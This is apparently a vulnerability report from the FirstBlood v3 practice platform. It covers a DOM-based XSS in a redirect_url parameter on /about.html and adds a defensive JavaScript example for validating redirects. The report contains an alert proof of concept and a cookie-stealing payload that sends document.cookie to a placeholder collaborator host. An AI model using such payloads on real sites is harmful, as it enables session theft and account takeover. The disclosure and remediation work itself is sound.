FirstBlood-#1102 — DOM-based XSS on /about.html can lead to account takeover
This issue was discovered on FirstBlood v3
On 2022-12-08, 0xblackbird Level 5 reported:
Summary:
Hi mate!
I hope you're doing well today!
I found a DOM-based XSS vulnerability on about.html; it was hard to catch, as it immediately redirects you to about.php ;)
Possible cause:
User input that got passed through the return_url query parameter ends up in a DOM sink. We could use the javascript protocol to execute javascript directly in our browser.
Impact:
I was able to execute javascript code on the doctor's behalf. Even more, I was also able to steal the sensitive session cookie as it is not an HTTPOnly cookie. This allowed me to successfully take over the account of the doctor.
Steps to reproduce:
Proof of concept: /about.html?redirect_url=javascript:alert(document.domain)
1) Spin up FirstBlood v3 if you haven't already
2) Visit the path PoC above
3) An alert popup should appear with the document's domain
Now, if the user is authenticated, we can easily take over the doctor's account, as cookies are not HTTPOnly. To do so, we could use the following payload to steal the cookies and send them back to us:
/about.html?redirect_url=javascript:location.href%3D%60//{BURP_COLLABORATOR}/collector?cookies=${document.cookie}%60
Upon visiting the URL (as the victim), we can see a hit with the cookies on our server:
Mitigation
For DOM-based XSS vulnerabilities, I recommend not passing raw user input into DOM sinks without proper validation. Use the history.pushState() method if you want to redirect a user without them ending up somewhere else or having JS executed in their web browser.
Thanks for hosting such an awesome event again!
Kind regards,
0xblackbird
P3 Medium
Endpoint: /about.html
Parameter: redirect_url
Payload: javascript:alert(document.domain)
FirstBlood ID: 45
Vulnerability Type: Reflective XSS
The endpoint about.php was introduced to replace about.html, but code on about.html introduces an XSS vulnerability via the javascript: URI
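The fix the report asks for, as an added example that is not part of the report or of FirstBlood's own code: a redirect parameter is resolved against the page origin and only followed when it is an http(s) URL on that same origin, so a javascript: value (or an off-site target) falls back to a default. The origin "https://app.example" and the helper names are constructed for the demo.

```javascript
// Added example (not FirstBlood's code): hardened handling of a
// redirect_url-style query parameter. The unsafe pattern the report
// describes is, in effect:  location.href = params.get("redirect_url");
// which lets a "javascript:" value run in the page's origin.

const DEFAULT_TARGET = "/about.php";

// Resolve the raw parameter against the page origin and accept it only if
// it is an http(s) URL on that same origin; otherwise return the default.
function resolveRedirect(rawParam, pageOrigin, fallbackPath = DEFAULT_TARGET) {
  const fallback = new URL(fallbackPath, pageOrigin).href;
  if (typeof rawParam !== "string" || rawParam.length === 0) return fallback;
  let target;
  try {
    target = new URL(rawParam, pageOrigin); // relative paths resolve here
  } catch (_) {
    return fallback; // unparsable input is never navigated to
  }
  // Scheme allowlist: rejects javascript:, data:, vbscript:, etc.
  // (URL parsing lowercases the scheme and trims leading whitespace,
  // so case and padding variants are covered too.)
  if (target.protocol !== "http:" && target.protocol !== "https:") return fallback;
  // Same-origin only: rejects "//other.example/..." open-redirect targets
  // and scheme downgrades to http: on the same host.
  if (target.origin !== new URL(pageOrigin).origin) return fallback;
  return target.href;
}

// Pull the parameter out of a query string ("?redirect_url=...") and
// resolve it; this is what the page would call before navigating.
function redirectFromQuery(search, pageOrigin) {
  const raw = new URLSearchParams(search).get("redirect_url");
  return resolveRedirect(raw, pageOrigin);
}

// Constructed demo (placeholder origin, not a real host):
const ORIGIN = "https://app.example";
const cases = [
  "?redirect_url=/patients.php",
  "?redirect_url=javascript:alert(document.domain)",
  "?redirect_url=//other.example/collector",
  "",
];
for (const c of cases) {
  console.log(JSON.stringify(c), "->", redirectFromQuery(c, ORIGIN));
}
// In the page itself: location.assign(redirectFromQuery(location.search, location.origin));
```

Independently of the redirect fix, setting the HttpOnly attribute on the session cookie closes the cookie-theft path the report describes, since document.cookie no longer exposes it.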